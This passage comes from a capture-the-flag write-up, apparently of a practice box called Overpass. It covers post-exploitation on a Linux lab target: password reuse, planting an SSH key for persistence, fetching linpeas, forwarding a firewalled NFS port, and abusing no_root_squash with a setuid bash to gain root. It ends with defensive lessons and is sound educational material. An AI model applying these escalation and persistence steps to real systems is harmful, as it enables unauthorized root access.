drwxr-xr-x. 2 root root 6 Sep 15 16:46 cgi-bin
drwxrwxrwx. 3 apache apache 143 Jan 25 20:32 html
cd cgi-bin
cd cgi-bin
ls -la
ls -la
total 0
drwxr-xr-x. 2 root root 6 Sep 15 16:46 .
drwxr-xr-x. 4 root root 33 Nov 8 02:02 ..
Nothing here. Flags are usually found in the user’s home directory. Let’s take a look.
cd ~
cd ~
ls -la
ls -la
total 24
drwxr-xr-x. 5 root root 63 Nov 17 20:54 .
drwxr-xr-x. 81 root root 4096 Nov 8 02:02 ..
drwxr-xr-x. 3 root root 4096 Nov 8 02:02 error
drwxr-xr-x. 3 root root 8192 Nov 8 02:02 icons
drwxr-xr-x. 3 root root 140 Nov 8 02:02 noindex
-rw-r--r--. 1 root root 38 Nov 17 20:54 web.flag
wc -c web.flag
wc -c web.flag
38 web.flag
Gaining a more stable foothold Link to heading
We want to gain a more stable foothold. Let’s see if paradox’s password is the same for the server.
bash-4.4$ su paradox
su paradox
Password: ****************
Huzzah! Time to raid his home directory
cd ~
cd ~
ls -la
ls -la
total 56
drwx------. 4 paradox paradox 203 Nov 18 18:29 .
drwxr-xr-x. 4 root root 34 Nov 8 19:34 ..
-rw-rw-r--. 1 paradox paradox 13353 Nov 8 21:23 backup.zip
lrwxrwxrwx. 1 paradox paradox 9 Nov 8 21:45 .bash_history -> /dev/null
-rw-r--r--. 1 paradox paradox 18 Nov 8 2019 .bash_logout
-rw-r--r--. 1 paradox paradox 141 Nov 8 2019 .bash_profile
-rw-r--r--. 1 paradox paradox 312 Nov 8 2019 .bashrc
-rw-rw-r--. 1 paradox paradox 10019 Nov 8 20:37 CustomerDetails.xlsx
-rw-rw-r--. 1 paradox paradox 10366 Nov 8 21:18 CustomerDetails.xlsx.gpg
drwx------. 4 paradox paradox 132 Nov 8 21:18 .gnupg
-rw-------. 1 paradox paradox 3522 Nov 8 21:16 priv.key
drwx------ 2 paradox paradox 47 Nov 18 18:32 .ssh
cd .ssh
cd .ssh
ls -la
ls -la
total 8
drwx------ 2 paradox paradox 47 Nov 18 18:32 .
drwx------. 4 paradox paradox 203 Nov 18 18:29 ..
-rw------- 1 paradox paradox 583 Nov 18 18:29 authorized_keys
-rw-r--r-- 1 paradox paradox 583 Nov 18 18:29 id_rsa.pub
No private key, that’s too bad. But we can always inject our own key.
On the attack machine, let’s generate a new ssh key.
ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/hydra/.ssh/id_rsa): id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in id_rsa
Your public key has been saved in id_rsa.pub
The key fingerprint is:
SHA256:SCs8tw9BrNajkYRdx+OtR3nSizpIRmXXhg9dkGe2/2Q hydra@kali
The key's randomart image is:
+---[RSA 3072]----+
| ... +.+. |
| o o .= + = + |
| . o ++ + * + . |
| o *.o. = + . |
| O.B So + . . |
| . *o+. o . E|
| .oo. o o.|
| .oo .|
| .. |
+----[SHA256]-----+
cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjPDDF2HsKfhRK2u5cIIa4w/WDA4g7eJizrWRWg+kghrdf//gV7HhxjQ2ZsEm6Y9+KWg0NgtVhG9Rg2mcZn/rwm3loJCQFk4r/EDr2DhYz8qozMwRwL0YlL1dV+DHxke3nZPZHFa9Bf9T3YjF8P4TzUaIHx9J5uQr8pdIPzkP1a/M7JYaqiwUn9rFMCVydtKeU9Ic/Gw25pwbvOkBiccDvC9UKYqqq5DXQtlDDpuzB/PXK16Vnl4JAW5HApthbvBHK/ayy8djxxuOUpIX68WtovmUYjMXFHFKodj+OPabAxc5TFxxKjGwQYg0UrLM4Mxs0cvTrT53FLV7Zj52Yr5OtYVouKA5vtVnaMnQRbkAM+Q+QZCGpnuO/BjdQH2VOmH2EPf3WmqUhGm1k9extW6VccFnJlCsOQy0+ag2IgnQv5E4Qkg7yEBWXVUo2drXAYMiPtmcQ69RjITgHqu8ngKTRM/v7bcNrGZ3atWj9MCU3rrnHeYzzHuMH4I+FkoQFd0U= hydra@kali
The defaults are fine here as this is a disposable key.
On the target box, let’s copy our public key to the authorized keys.
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCjPDDF2HsKfhRK2u5cIIa4w/WDA4g7eJizrWRWg+kghrdf//gV7HhxjQ2ZsEm6Y9+KWg0NgtVhG9Rg2mcZn/rwm3loJCQFk4r/EDr2DhYz8qozMwRwL0YlL1dV+DHxke3nZPZHFa9Bf9T3YjF8P4TzUaIHx9J5uQr8pdIPzkP1a/M7JYaqiwUn9rFMCVydtKeU9Ic/Gw25pwbvOkBiccDvC9UKYqqq5DXQtlDDpuzB/PXK16Vnl4JAW5HApthbvBHK/ayy8djxxuOUpIX68WtovmUYjMXFHFKodj+OPabAxc5TFxxKjGwQYg0UrLM4Mxs0cvTrT53FLV7Zj52Yr5OtYVouKA5vtVnaMnQRbkAM+Q+QZCGpnuO/BjdQH2VOmH2EPf3WmqUhGm1k9extW6VccFnJlCsOQy0+ag2IgnQv5E4Qkg7yEBWXVUo2drXAYMiPtmcQ69RjITgHqu8ngKTRM/v7bcNrGZ3atWj9MCU3rrnHeYzzHuMH4I+FkoQFd0U= hydra@kali" >> authorized_keys
Now we should be able to login over ssh.
SSH (Finally) Link to heading
Using the key we just generated,
ssh -i id_rsa paradox@$TARGET_IP
Last login: Mon Jan 25 20:43:46 2021
Now let’s kill off our reverse shell and see what we can do.
Sudo? Link to heading
One simple check we should almost always do first is sudo
. This command allows us to run commands as another user, and usually root.
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for paradox:
Sorry, user paradox may not run sudo on ip-10-10-71-195.
Looks like the admins don’t trust paradox to not do anything rash and haven’t granted him any special privileges. Smart admins, but too bad for us.
(Lin)peas in a pod Link to heading
We could sniff around manually, or we could use one of the many awesome scripts to search for us. Linpeas is one of these awesome scripts. Let’s grab the most recent version from our attack box and scp it over.
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh -o linpeas.sh
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 312k 100 312k 0 0 2441k 0 --:--:-- --:--:-- --:--:-- 2422k
scp -i id_rsa linpeas.sh paradox@$TARGET_IP:~/linpeas.sh
linpeas.sh
On the target, we need to set the script as executable and then run it.
chmod +x linpeas.sh
./linpeas.sh
Starting linpeas. Caching Writable Folders...
ββββββββββββββ
βββββββ βββββββββ
βββββββ ββββββββββββββββββββ βββββ
ββββ β ββββββββββββββββββββββββββββββ βββββββ
β βββββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββββββββ βββββ βββββββββββββββββ
βββββββββββ ββββββ ββββββ β
ββββββ ββββββββ ββββ
ββ βββ βββββ βββ
ββ ββββββββββββ ββ
β ββ βββββββββββββββββββββββββββββ ββ
β βββββββββββββββββββββββββββββββββββββββββββ
ββββββββββββββ ββββ
βββββ βββββ ββββββ ββββ
ββββ βββββ βββββ β ββ
βββββ βββββ βββββββ βββββ βββββ
ββββββ βββββββ βββββββ βββββββ βββββ
ββββββββββββββ β βββββββββββββββ
βββββββββββββ ββββββββββββββ
βββββββββββ ββββββββββββββ
ββββββββββββββββββ ββββββββββββββββββββ
ββββββ ββββββββββββββββββββββββββ βββββββββββββ
ββββββββ ββββββββββ ββββββββββ
βββββββββββββββββββββββββ
linpeas v3.0.3 by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You must take a look at it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMangeta: Your username
...
I’m going to truncate this because it’s nearly 1300 lines, and noone wants to read through all that here ;)
So a bit further down, we see a section that is highlighted in red and yellow, very shouty.
[+] NFS exports?
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
/home/james *(rw,fsid=0,sync,no_root_squash,insecure)
We have an NFS mount! But we didn’t see NFS anywhere on the nmap scan! This tells us that the port is probably behind a firewall. A quick google search tells us that fsid=0 means that we are using NFSv4 here. This is good, as we only have 1 port to worry about.
Forwarding all the ports! Link to heading
Google also tells us that NFSv4 uses port 2049. So let’s forward that port locally.
ssh -fNL 2049:localhost:2049 -i id_rsa paradox@$TARGET_IP
Mount up Link to heading
First we’ll create a mount point and then mount the drive. There’s a small hitch in that we’ll mount using localhost, as we’re forwarding that port over.
mkdir mnt
sudo mount -t nfs4 localhost:/ mnt
entering into our mount point, we can see files!
cd mnt
ls -la
total 20
drwx------ 3 hydra hydra 112 Nov 17 22:15 ./
drwxr-xr-x 8 hydra hydra 4096 Jan 25 22:25 ../
lrwxrwxrwx 1 root root 9 Nov 8 22:45 .bash_history -> /dev/null
-rw-r--r-- 1 hydra hydra 18 Nov 8 2019 .bash_logout
-rw-r--r-- 1 hydra hydra 141 Nov 8 2019 .bash_profile
-rw-r--r-- 1 hydra hydra 312 Nov 8 2019 .bashrc
drwx------ 2 hydra hydra 61 Nov 8 03:20 .ssh/
-rw------- 1 hydra hydra 38 Nov 17 22:15 user.flag
wc -c user.flag
38 user.flag
The no_root_squash
option that we saw earlier is also very interesting, It basically will allow files owned by root to keep their root privileges. Basically, your root is my root, and my root is your root.
Because we have root privileges on our attacker box, we can abuse this setting to add a sticky bit to something like bash and execute that as a user to gain root access to the target machine. Let’s see this in action.
cp /bin/bash .
sudo chown root:root ./bash
sudo chmod +s ./bash
ls -la
total 1228
drwx------ 3 hydra hydra 124 Jan 25 22:34 ./
drwxr-xr-x 8 hydra hydra 4096 Jan 25 22:25 ../
-rwsr-sr-x 1 root root 1234376 Jan 25 22:34 bash*
lrwxrwxrwx 1 root root 9 Nov 8 22:45 .bash_history -> /dev/null
-rw-r--r-- 1 hydra hydra 18 Nov 8 2019 .bash_logout
-rw-r--r-- 1 hydra hydra 141 Nov 8 2019 .bash_profile
-rw-r--r-- 1 hydra hydra 312 Nov 8 2019 .bashrc
drwx------ 2 hydra hydra 61 Nov 8 03:20 .ssh/
-rw------- 1 hydra hydra 38 Nov 17 22:15 user.flag
We can also modify the permissions of james’ home directory to allow access to paradox.
sudo chmod +rx .
ls -la
total 1228
drwxr-xr-x 3 hydra hydra 124 Jan 25 22:34 ./
drwxr-xr-x 8 hydra hydra 4096 Jan 25 22:25 ../
-rwsr-sr-x 1 root root 1234376 Jan 25 22:34 bash*
lrwxrwxrwx 1 root root 9 Nov 8 22:45 .bash_history -> /dev/null
-rw-r--r-- 1 hydra hydra 18 Nov 8 2019 .bash_logout
-rw-r--r-- 1 hydra hydra 141 Nov 8 2019 .bash_profile
-rw-r--r-- 1 hydra hydra 312 Nov 8 2019 .bashrc
drwx------ 2 hydra hydra 61 Nov 8 03:20 .ssh/
-rw------- 1 hydra hydra 38 Nov 17 22:15 user.flag
Now as paradox, we should be able to run our bash with the -p option!
/home/james/bash -p
/home/james/bash: /lib64/libtinfo.so.6: no version information available (required by /home/james/bash)
Oh…darn… or is it?
Root! Link to heading
Apparently it’s not as bad as we though because regardless of the error, we have do actually have root.
id
uid=1001(paradox) gid=1001(paradox) euid=0(root) egid=0(root) groups=0(root),1001(paradox)
cd /root
ls -la
total 24
dr-x------. 3 root root 141 Nov 17 23:53 .
drwxr-xr-x. 17 root root 244 Nov 18 19:16 ..
lrwxrwxrwx. 1 root root 9 Nov 8 21:44 .bash_history -> /dev/null
-rw-------. 1 root root 18 May 11 2019 .bash_logout
-rw-------. 1 root root 176 May 11 2019 .bash_profile
-rw-------. 1 root root 176 May 11 2019 .bashrc
-rw-------. 1 root root 100 May 11 2019 .cshrc
-rw-------. 1 root root 38 Nov 17 20:55 root.flag
drwxr-xr-x 2 root root 29 Nov 17 23:53 .ssh
-rw-------. 1 root root 129 May 11 2019 .tcshrc
wc -c root.flag
38 root.flag
The End? Link to heading
This is the end of this chapter of the Overpass saga. Will it continue? Who knows? But I had a lot of fun with this box.
Lessons To Take Away Link to heading
- Don’t have extraneous functionality for your websites. If you don’t need php, then don’t enable it.
- Obviously, don’t reuse passwords.
- Let’s not leave backups lying around in prod. That’s almost always a bad idea.
- Speaking of backups, while it was encrypted (yay), leaving the private key right next to the file is a bad idea.
- NFS mounts are great, though even if they’re behind a firewall, it just takes one weak point to gain access via port forwards.
- The
no_root_squash
property should never be used. You don’t need it. Ever.